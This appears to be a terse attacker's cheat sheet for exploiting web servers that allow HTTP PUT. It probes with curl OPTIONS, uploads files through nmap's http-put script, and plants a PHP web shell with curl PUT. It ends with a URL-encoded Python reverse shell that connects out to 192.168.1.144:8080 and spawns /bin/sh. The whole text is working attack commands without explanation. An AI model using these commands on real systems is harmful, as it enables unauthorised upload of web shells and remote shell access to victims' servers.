curl -I -X OPTIONS IP/test

nmap -p 80 IP --script http-put --script-args http-put.url='/test/res.py',http-put.file='/var/www/html/web/revshell.py'

<?php system($_GET['cmd']);

curl -X PUT -d '<?php system($_GET["c"]);' http://192.168.56.103/test/1.php

#reverse shell

http://192.168.1.115/test/msfupload.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.1.144%22,8080));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27